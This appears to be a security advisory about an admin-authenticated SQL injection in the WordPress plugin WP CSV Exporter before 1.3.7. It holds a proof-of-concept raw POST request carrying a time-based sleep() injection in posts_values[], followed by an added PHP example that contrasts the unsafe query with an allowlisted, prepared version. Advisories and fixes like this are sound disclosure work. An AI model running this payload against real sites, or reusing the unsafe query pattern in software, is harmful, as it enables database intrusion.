wpexploit - Asif Nawaz Minhas - WPEX-ID:6503DA78-A2BF-4B4C-B56D-21C8C55B076E
History: Nov 09, 2022 - 12:00 a.m.

WP CSV Exporter < 1.3.7 - Admin+ SQLi

2022-11-09 00:00:00
Asif Nawaz Minhas
Tags: sql injection, admin, intercept request, delayed response, security vulnerability, wordpress plugin

EPSS: 0.001
Percentile: 37.9%

The plugin does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks.

As an admin, go to Tools > CSV Export, leave everything as default and click on Export POSTS CSV.

Intercept the request made and change the posts_values%5B%5D=post_name parameter to posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a).

This will delay the response by 5 seconds.

Raw request:

POST /wp-content/plugins/wp-csv-exporter/admin/download.php HTTP/1.1
Cookie: [admin+]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 272
Upgrade-Insecure-Requests: 1
Connection: close

_wpnonce=7d0447e58b&post_id=post_id&type=post&posts_values%5B%5D=post_name%2c(select*from(select(sleep(5)))a)&posts_values%5B%5D=7*7&posts_values%5B%5D=post_content&post_status%5B%5D=publish&limit=0&offset=0&order_by=DESC&post_date_from=&post_date_to=&post_modified_from=&post_modified_to=&string_code=UTF-8
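As an added example (not the plugin's code and not part of the original advisory), the unsafe shape the advisory describes, where entries of posts_values[] are concatenated into the SELECT as column names, is shown beside an allowlisted version using WordPress's $wpdb. The function names and the allowed-column list are assumptions.

```php
<?php
// Added illustration, not code from WP CSV Exporter. Function names such as
// wpcsv_build_export_query() and the allowed-column list are assumptions.

// Unsafe shape of the bug: user-controlled strings become SQL identifiers, so a
// posts_values[] entry like "post_name,(select*from(select(sleep(5)))a)" is
// executed as part of the column list.
function wpcsv_build_export_query_unsafe( array $posts_values ) {
    global $wpdb;
    $columns = implode( ', ', $posts_values );
    return "SELECT {$columns} FROM {$wpdb->posts} WHERE post_status = 'publish'";
}

// Hardened: identifiers cannot be bound with $wpdb->prepare() placeholders
// (%s would quote them as strings), so only exact, known wp_posts column
// names are accepted; everything else is rejected before any SQL is built.
const WPCSV_ALLOWED_COLUMNS = array(
    'ID', 'post_author', 'post_date', 'post_title', 'post_name',
    'post_content', 'post_excerpt', 'post_status', 'post_type', 'post_modified',
);

function wpcsv_build_export_query( array $posts_values, array $post_status, $limit, $offset ) {
    global $wpdb;

    // Allowlist check: "7*7" or a sleep() subquery is not in the list, so the
    // request fails closed instead of reaching the query string.
    $columns = array_values( array_intersect( $posts_values, WPCSV_ALLOWED_COLUMNS ) );
    if ( empty( $columns ) || count( $columns ) !== count( $posts_values ) ) {
        return new WP_Error( 'wpcsv_bad_column', 'Unknown column requested.' );
    }
    $select = implode( ', ', array_map( function ( $c ) { return "`{$c}`"; }, $columns ) );

    // post_status, limit and offset are data, not identifiers, so they are
    // bound through prepare() with %s / %d placeholders.
    $placeholders = implode( ', ', array_fill( 0, count( $post_status ), '%s' ) );
    $sql = "SELECT {$select} FROM {$wpdb->posts} WHERE post_status IN ({$placeholders}) "
         . 'ORDER BY post_date DESC LIMIT %d OFFSET %d';
    return $wpdb->prepare( $sql, array_merge( $post_status, array( (int) $limit, (int) $offset ) ) );
}
```

A capability check (current_user_can()) and the existing _wpnonce verification still belong in front of this, since the advisory's precondition is an admin-level session; the allowlist removes the injection regardless of privilege.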
